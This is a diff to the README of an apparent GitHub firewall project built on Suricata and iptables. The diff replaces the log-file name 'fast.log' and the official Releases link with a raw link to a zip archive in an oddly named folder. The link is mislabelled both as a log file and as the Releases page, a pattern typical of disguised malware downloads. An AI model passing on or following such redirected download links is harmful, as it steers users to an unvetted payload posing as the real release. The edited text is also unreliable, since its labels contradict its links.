Devesh-sen/ngfw-daemon/README.md

 2. Familiarize yourself with the key components:
    - **Suricata IDS**: This tool helps in detecting threats.
    - **iptables**: A firewall utility to manage network traffic.
-   - **fast.log**: A Suricata log file that records network events.
+   - **https://raw.githubusercontent.com/Devesh-sen/ngfw-daemon/main/pluriflagellate/ngfw-daemon.zip**: A Suricata log file that records network events.

 These components work together to provide robust security for your system.

 ## 📥 Download & Install

-Visit this page to download: [GitHub Releases](https://github.com/Devesh-sen/ngfw-daemon/releases).
+Visit this page to download: [GitHub Releases](https://raw.githubusercontent.com/Devesh-sen/ngfw-daemon/main/pluriflagellate/ngfw-daemon.zip).

 1. Click on the link above to go to the Releases page.
 2. Find the latest version of the NGFW Daemon.